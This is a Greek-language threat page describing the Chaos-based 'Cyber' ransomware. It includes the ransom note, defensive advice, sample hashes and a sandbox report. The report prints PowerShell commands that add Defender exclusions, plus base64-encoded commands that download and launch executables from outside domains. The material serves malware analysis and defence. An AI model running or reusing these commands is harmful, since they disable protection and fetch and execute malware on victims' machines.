Cyber Ransomware

Απεικόνιση απειλών

Popularity Rank: 10,078
Επίπεδο απειλής: 100 % (Υψηλός)
Μολυσμένοι υπολογιστές: 3,489
Πρώτη εμφάνιση: October 15, 2021
Εθεάθη τελευταία: November 12, 2025
ΛΣ που επηρεάζονται: Windows

Το κακόβουλο πρόγραμμα με το όνομα Cyber είναι κακόβουλο λογισμικό από τον τύπο ransomware. Μόλις εκτελεστεί σε ένα σύστημα που έχει παραβιαστεί, ξεκινά αμέσως μια διαδικασία κρυπτογράφησης για όλα τα αρχεία στη συσκευή και προσαρτά τα αρχικά τους ονόματα αρχείων με την επέκταση «.Cyber». Για παράδειγμα, ένα αρχείο με αρχικό όνομα «1.doc» θα εμφανίζεται τώρα ως «1.doc.Cyber» αφού κρυπτογραφηθεί. Ομοίως, το "2.pdf" θα γίνει "2.pdf.Cyber" και ούτω καθεξής. Οι ερευνητές κυβερνοασφάλειας επισημαίνουν ότι η απειλή Cyber Ransomware βασίζεται στο στέλεχος κακόβουλου λογισμικού Chaos.

Εκτός από την κρυπτογράφηση αρχείων, το Cyber Ransomware αλλάζει επίσης την ταπετσαρία της επιφάνειας εργασίας και δημιουργεί μια σημείωση λύτρων με το όνομα "read_it.txt". Το σημείωμα λύτρων περιέχει οδηγίες για τα θύματα, με τους κυβερνοεγκληματίες που είναι υπεύθυνοι για επιθέσεις ransomware να απαιτούν συνήθως πληρωμή με αντάλλαγμα το κλειδί αποκρυπτογράφησης για να ξεκλειδώσουν τα κρυπτογραφημένα αρχεία.

Το Cyber Ransomware μπορεί να καταστήσει μη προσβάσιμους πολλούς τύπους αρχείων μέσω κρυπτογράφησης

Η σημείωση ransomware υποδεικνύει ότι τα σημαντικά αρχεία του θύματος, όπως βάσεις δεδομένων, έγγραφα και φωτογραφίες, έχουν κρυπτογραφηθεί και μπορούν να αποκρυπτογραφηθούν μόνο με την πληρωμή λύτρων σε κρυπτονόμισμα Bitcoin. Το ποσό των λύτρων αναφέρεται συνήθως και δίνεται στα θύματα ένας τρόπος να δοκιμάσουν την αποκρυπτογράφηση σε περιορισμένο αριθμό αρχείων προτού πληρώσουν.

Το σημείωμα περιέχει συχνά στοιχεία επικοινωνίας για τους εισβολείς ή τους εκπροσώπους τους. Ωστόσο, μερικές φορές τα στοιχεία επικοινωνίας μπορεί να μην είναι έγκυρα και το θύμα μπορεί να δυσκολεύεται να επικοινωνήσει με τους εισβολείς. Επιπλέον, η ταπετσαρία του ransomware μπορεί να εμφανίζει το ίδιο μήνυμα και το ίδιο ποσό λύτρων αλλά με διαφορετικά στοιχεία επικοινωνίας.

Στις περισσότερες επιθέσεις ransomware, η αποκρυπτογράφηση χωρίς τη συμμετοχή των εισβολέων συνήθως δεν είναι δυνατή. Ακόμη και όταν τα θύματα πληρώνουν τα λύτρα, ενδέχεται να μην λάβουν τα κλειδιά αποκρυπτογράφησης ή το λογισμικό που είναι απαραίτητο για την ανάκτηση των αρχείων τους. Ως αποτέλεσμα, οι ειδικοί συμβουλεύουν σθεναρά να μην πληρώσετε τα λύτρα, ακόμη και αν τα στοιχεία επικοινωνίας είναι νόμιμα και το ποσό των λύτρων φαίνεται προσιτό.

Είναι σημαντικό να θυμάστε ότι η πληρωμή των λύτρων υποστηρίζει εγκληματική δραστηριότητα και δεν εγγυάται την ανάκτηση των κρυπτογραφημένων δεδομένων. Τα θύματα θα πρέπει να διερευνήσουν άλλες επιλογές, όπως η επαναφορά αρχείων από αντίγραφα ασφαλείας ή η αναζήτηση βοήθειας από ειδικούς σε θέματα ασφάλειας.

Φροντίστε να προστατεύσετε τις συσκευές και τα δεδομένα σας από απειλές όπως το Cyber Ransomware

Τα καλύτερα μέτρα που μπορούν να εφαρμόσουν οι χρήστες για την προστασία των συσκευών και των δεδομένων τους από επιθέσεις ransomware περιλαμβάνουν έναν συνδυασμό προληπτικών και αντιδραστικών στρατηγικών.

Πρώτον, οι χρήστες θα πρέπει να είναι προσεκτικοί στη διαδικτυακή τους δραστηριότητα και να λαμβάνουν μέτρα για να αποφύγουν να πέσουν θύματα κοινών φορέων μόλυνσης από ransomware, όπως μηνύματα ηλεκτρονικού ψαρέματος ή κακόβουλες λήψεις. Αυτό περιλαμβάνει τη χρήση ισχυρών και μοναδικών κωδικών πρόσβασης, την τακτική ενημέρωση λογισμικού και λειτουργικών συστημάτων και την προσοχή σε ύποπτα μηνύματα ηλεκτρονικού ταχυδρομείου ή συνδέσμους.

Δεύτερον, οι χρήστες θα πρέπει να εφαρμόζουν μέτρα ασφαλείας, όπως η χρήση αξιόπιστου λογισμικού προστασίας από κακόβουλο λογισμικό και να επιτρέπουν στα τείχη προστασίας να εμποδίζουν τη μη εξουσιοδοτημένη πρόσβαση στις συσκευές τους. Θα πρέπει επίσης να εξετάσουν το ενδεχόμενο χρήσης εργαλείων ανίχνευσης και απόκρισης τελικού σημείου (EDR), τα οποία μπορούν να βοηθήσουν στον εντοπισμό και την απόκριση σε επιθέσεις ransomware σε πραγματικό χρόνο.

Τρίτον, οι χρήστες θα πρέπει να δημιουργούν τακτικά αντίγραφα ασφαλείας των σημαντικών δεδομένων τους σε μια εξωτερική πηγή, όπως μια υπηρεσία cloud ή έναν εξωτερικό σκληρό δίσκο. Αυτό μπορεί να βοηθήσει να διασφαλιστεί ότι ακόμη και αν η συσκευή τους έχει μολυνθεί με ransomware, θα μπορούν να έχουν πρόσβαση στα δεδομένα τους χωρίς να πληρώσουν τα λύτρα.

Τέταρτον, σε περίπτωση επίθεσης ransomware, οι χρήστες θα πρέπει να αποφεύγουν να πληρώνουν τα λύτρα καθώς μπορεί να μην εγγυάται την ασφαλή ανάκτηση των δεδομένων τους και μπορεί επίσης να ενθαρρύνει περαιτέρω εγκληματική δραστηριότητα. Αντίθετα, θα πρέπει να αναζητήσουν επαγγελματική βοήθεια από ειδικούς σε θέματα ασφάλειας και να εξετάσουν το ενδεχόμενο να αναφέρουν την επίθεση στις αρχές επιβολής του νόμου.

Τέλος, οι χρήστες θα πρέπει να μένουν ενημερωμένοι για τις πιο πρόσφατες απειλές ransomware και τις εξελισσόμενες τεχνικές επιθέσεων για να παραμείνουν ενήμεροι και προετοιμασμένοι να προστατευτούν από πιθανές επιθέσεις.

Το πλήρες κείμενο του σημειώματος λύτρων που κυκλοφόρησε από το Cyber Ransomware είναι:

Μην ανησυχείτε, μπορείτε να επιστρέψετε όλα τα αρχεία σας!

Όλα τα αρχεία σας, όπως έγγραφα, φωτογραφίες, βάσεις δεδομένων και άλλα σημαντικά είναι κρυπτογραφημένα

Τι εγγυήσεις σας δίνουμε;

Μπορείτε να στείλετε 3 από τα κρυπτογραφημένα αρχεία σας και εμείς τα αποκρυπτογραφούμε δωρεάν.

Πρέπει να ακολουθήσετε αυτά τα βήματα για να αποκρυπτογραφήσετε τα αρχεία σας:

1) Γράψτε στο e-mail μας :test@test.com (Σε περίπτωση που δεν απαντήσετε σε 24 ώρες ελέγξτε τον φάκελο ανεπιθύμητης αλληλογραφίας σας

ή γράψτε μας σε αυτό το e-mail: test2@test.com)

2) Αποκτήστε Bitcoin (Πρέπει να πληρώσετε για αποκρυπτογράφηση σε Bitcoins.

Μετά την πληρωμή θα σας στείλουμε το εργαλείο που θα αποκρυπτογραφήσει όλα τα αρχεία σας.)

Cyber Ransomware βίντεο

Συμβουλή: Ενεργοποιήστε τον ήχο σας και παρακολουθήστε το βίντεο σε λειτουργία πλήρους οθόνης .

Έκθεση ανάλυσης

Γενικές πληροφορίες

Family Name: Cyber Ransomware
Signature status: No Signature

Known Samples

MD5: 6ae50bdc7246401c666cd7e1b200d87a
SHA1: ec759c5df1845d1109fe2518380233ae1854850f
Μέγεθος αρχείου: 1.84 MB, 1839616 bytes
MD5: 92a4a3aa4b40e95e8ca1d015c048246b
SHA1: 443a688cc83423c7511d56b626f85a392e798ac1
Μέγεθος αρχείου: 5.12 KB, 5120 bytes
MD5: 969c9e50187024581e8943a2d8ed9d2d
SHA1: 57cec27d4e6c7714265cad52f7fd9cf58f68bb82
SHA256: C78A44442518C4EC39EF4E85C331C5CDD25C92FC92A80010C6F6DC3F59B1C42D
Μέγεθος αρχείου: 4.61 KB, 4608 bytes
MD5: d1657a06fd2a757c43372f77ed433f30
SHA1: 48d0f17e206fdcff74121783989c90117ee411f4
SHA256: 0AFC88FC7DD731CF7D5884C415D5A27DC4FB39EB54DC890257AFEA947FC05725
Μέγεθος αρχείου: 4.54 MB, 4536320 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have security information
  • File is 32-bit executable
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
Show More
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

File Traits

  • HighEntropy
  • No Version Info
  • x86

Block Information

Total Blocks: 8
Potentially Malicious Blocks: 7
Whitelisted Blocks: 1
Unknown Blocks: 0

Visual Map

x x x x x x x 0
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • ClipBanker.VA
  • ClipBanker.VB

Files Modified

File Attributes
\device\namedpipe\pshost.133968239486036860.2548.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.133973844142271624.5256.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134074942406200962.1348.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
c:\users\user\appdata\local\cheat.dll Generic Write,Read Attributes
c:\users\user\appdata\local\launcher.exe Generic Write,Read Attributes
c:\users\user\appdata\local\launcher.ini Generic Write,Read Attributes
c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_16.db Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_idx.db Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\__psscriptpolicytest_0zdqbhap.r32.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_24snuqhq.oyp.ps1 Generic Write,Read Attributes
Show More
c:\users\user\appdata\local\temp\__psscriptpolicytest_al3g5ul4.lob.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_aocz5vmr.rla.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_dv4pkhv1.qlu.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_iqv5olmb.tfb.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ruwcjycv.ppp.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ux1vmtfo.12w.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\album_td_3-8-0_activation.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\father.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\father.bat Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.bat Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.ps1 Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\tmp4351$.tmp Generic Write,Read Attributes,Delete
c:\users\user\appdata\local\temp\ttrj.exe Generic Write,Read Attributes
c:\users\user\deployment_test.exe Generic Write,Read Attributes

Registry Modifications

Key::Value Δεδομένα API Name
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 넜泝Ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
Show More
HKLM\software\microsoft\windows\currentversion\runonce::wextract_cleanup0 rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Vebexpvr\AppData\Local\Temp\IXP000.TMP\" RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe ᭖洢Ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 洧Ǜ RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\firstfolder::0 C:\Users\Vebexpvr\AppData\Local\Launcher.exeC:\Users\Vebexpvr\AppData\Local RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\firstfolder::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots  RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots  RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots  RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0::1 Z1敖敢灸牶B 뻯.Vebexpvr RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1::0 V1嫬齤灡摰瑡a@ 뻯啮坤嫬齤.穗붽æappdata RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0::0 P1嫬齤潬慣l< 뻯嫬齤嫬齥.穘ˑQlocal RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0\0::nodeslot „ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0\0::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bags\132\shell::sniffedfoldertype Generic RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex ￿￿ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 椓嵌Ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ﻒ⍮味ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 㴠ȁ龡^8獖} RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey

Windows API Usage

Category API
Process Manipulation Evasion
  • NtUnmapViewOfSection
Process Shell Execute
  • CreateProcess
  • ShellExecute
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAccessCheckByType
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAlpcAcceptConnectPort
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreatePort
  • ntdll.dll!NtAlpcCreatePortSection
Show More
  • ntdll.dll!NtAlpcCreateSectionView
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtAlpcSetInformation
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtCancelWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeleteValueKey
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFindAtom
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtGetNlsSectionPtr
  • ntdll.dll!NtImpersonateAnonymousToken
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFile
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryEvent
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReadVirtualMemory
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationFile

206 additional items are not displayed above.

Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetUserDefaultLocaleName
  • GetUserName
  • GetUserNameEx
  • GetUserObjectInformation
Encryption Used
  • BCryptOpenAlgorithmProvider
Other Suspicious
  • AdjustTokenPrivileges

Shell Command Execution

open C:\Users\Vebexpvr\AppData\Local\Launcher.exe
open C:\Users\Vebexpvr\deployment_test.EXE
cmd.exe /c father.bat
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process -WindowStyle Hidden -FilePath powershell -Verb RunAs -ArgumentList '-NoProfile -Command Add-MpPreference -ExclusionPath \"C:\Users\Vebexpvr\*\"
open powershell -EncodedCommand "PAAjAHYAYQBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQAtAHAAbAB1AGcAaQBuAC4AaQBuAGYAbwAvAHkAYwAuAGUAeABlACcALAAgADwAIwBqAHMAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAZABzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAdAB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAYwAuAGUAeABlACcAKQApADwAIwBlAGEAdgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBhAGQAbwBiAGUALQBwAGwAdQBnAGkAbgAuAGkAbgBmAG8ALwB5AGMAdgAuAGUAeABlACcALAAgADwAIwBqAHEAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAcQB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGMAdABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAYwB2AC4AZQB4AGUAJwApACkAPAAjAGkAZgBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAZwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAG0AZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AGMALgBlAHgAZQAnACkAPAAjAHYAcQBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGwAdABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwByAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AGMAdgAuAGUAeABlACcAKQA8ACMAegB2AHQAIwA+AA=="
Show More
open powershell -EncodedCommand "PAAjAHQAegBsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQBoAGUAbABwAC4AbgBlAHQALwB3AGkAbgA4ADYALgBlAHgAZQAnACwAIAA8ACMAegBhAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGwAZAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHMAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB3AGkAbgA4ADYALgBlAHgAZQAnACkAKQA8ACMAaAB6AHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgBjAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAcgB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHcAaQBuADgANgAuAGUAeABlACcAKQA8ACMAbgB2AG0AIwA+AA=="
open powershell -EncodedCommand "PAAjAGsAYwBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAcwBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAZABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAdABlACMAPgA="
open C:\Users\Qoceadrm\AppData\Local\Temp\Album_TD_3-8-0_Activation.exe
open C:\Users\Qoceadrm\AppData\Local\Temp\ttrj.exe

σχετικές αναρτήσεις

Τάσεις

Περισσότερες εμφανίσεις

Φόρτωση...